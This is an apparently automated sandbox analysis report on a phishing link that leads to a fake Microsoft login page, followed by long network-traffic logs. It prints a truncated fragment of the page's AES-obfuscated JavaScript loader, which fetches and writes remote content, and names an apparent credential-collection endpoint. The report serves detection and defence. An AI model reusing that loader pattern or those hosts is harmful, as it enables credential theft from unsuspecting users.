Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be

Overview

General Information

Sample URL:https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be
Analysis ID:1491848

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish70
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1932,i,7627632924546915313,1275386535466264865,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • HxOutlook.exe (PID: 1444 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca MD5: 6F8EAC2C377C8F16D91CB5AC8B8DBF5F)
  • cleanup
SourceRuleDescriptionAuthorStrings
51.8.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    51.6.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://finlafrique.com/securefile.htmlLLM: Score: 10 Reasons: The domain 'finlafrique.com' does not match the brand name 'Microsoft', and the domain is not associated with Microsoft. The simple design and minimalistic approach are common tactics used in phishing attempts to appear legitimate. DOM: 51.9.pages.csv
      Source: https://finlafrique.com/securefile.htmlLLM: Score: 10 Reasons: The domain 'finlafrique.com' does not match the identified brand 'Microsoft', the domain name contains an unusual combination of words and does not appear to be associated with Microsoft. The webpage appears to be a phishing attempt using the Microsoft brand to trick users into entering their login credentials. DOM: 51.10.pages.csv
      Source: Yara matchFile source: 51.8.pages.csv, type: HTML
      Source: Yara matchFile source: 51.6.pages.csv, type: HTML
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: https://bytedynamics.ru///6718.php
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: window.location.href = atob(
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: async function races(saboteur) { <!-- <span>driving is a symphony of motion.</span> --> var {a,b,c,d} = json.parse(saboteur); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function ulster() {facet.hidden = 0;cabbage.hidden = 1; document.write(await races(await (await fetch(await races(atob(`eyjhijoimmt2cvbjrxzcl05qsvr4bxrdvthmtetqyjvmswp3a2rzbllrwgjxeulxnve9iiwiyyi6imy3mzhmm2zkzwqxnzg4mdhhzte3odi1ytuwnti1mdbmiiwiyii6ijmynwyyyty0ndnkzgq4zwmwymzjmdnmognlzgi4ote2ywuznwzmmjzlmmewywe1zjaxzmixmtflmjhlztrjzdqwytnmyta1y2mzytkymde0yjfhzgiwmzqwzdmxzdeymmfjzwrkmzqxnmfhywe4njflota2nju3mdzjogmyytqzytcwyzuwmzy0ngfjzwm1ogzlndnlnwrinti0yzg0zdq5odfhzmy3zwuym2riogm1mjrjztyxyjk0yzkyogzkmmm3odbjyjjimjfmoti5zgu1zmmwyze0mmezmgy0nzzhmtrjn2rhoty4nwrmyzuwn2u0mzuyy2fmndzlmzk2odqzngnkztyymmq5mmfjnzi2owm5ztf...
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: Number of links: 0
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: Total embedded image size: 45708
      Source: https://papsolutionsptyltd.sharefile.com/share/view/scf26ff3a4b6d4c1db1815de3794eb6beHTTP Parser: Base64 decoded: {"version":3,"sources":["webpack://./node_modules/react-loading-skeleton/dist/skeleton.css"],"names":[],"mappings":"AAAA;EACE;IACE,2BAA2B;EAC7B;AACF;;AAEA;EACE,qBAAqB;EACrB,0BAA0B;EAC1B,0BAA0B;EAC1B,6BAA6B;EAC7B,+BAA+B,EAAE,qBAAqB;;EAEtD,mCAAmC;;EAEnC,WAA...
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: Title: obliquely does not match URL
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: <input type="password" .../> found
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No favicon
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No favicon
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No favicon
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No favicon
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No <meta name="author".. found
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No <meta name="author".. found
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No <meta name="copyright".. found
      Source: https://finlafrique.com/securefile.htmlHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.16:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49949 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.16:49951 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49953 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49718 -> 1.1.1.1:53
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: t1.a.editions-legislatives.fr
      Source: global trafficDNS traffic detected: DNS query: papsolutionsptyltd.sharefile.com
      Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.us-east-1.sdk.awswaf.com
      Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: app.launchdarkly.com
      Source: global trafficDNS traffic detected: DNS query: papsolutionsptyltd.sf-api.com
      Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-content.customer.pendo.io
      Source: global trafficDNS traffic detected: DNS query: piletfeed-cdn.sharefile.io
      Source: global trafficDNS traffic detected: DNS query: o49063.ingest.sentry.io
      Source: global trafficDNS traffic detected: DNS query: js-agent.newrelic.com
      Source: global trafficDNS traffic detected: DNS query: events.launchdarkly.com
      Source: global trafficDNS traffic detected: DNS query: bam.nr-data.net
      Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-data.customer.pendo.io
      Source: global trafficDNS traffic detected: DNS query: sf-cv.sharefile.com
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: sf-renderx-us-east-1.sharefile.com
      Source: global trafficDNS traffic detected: DNS query: sf-temp-us-east-1-production.s3.amazonaws.com
      Source: global trafficDNS traffic detected: DNS query: finlafrique.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: bytedynamics.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
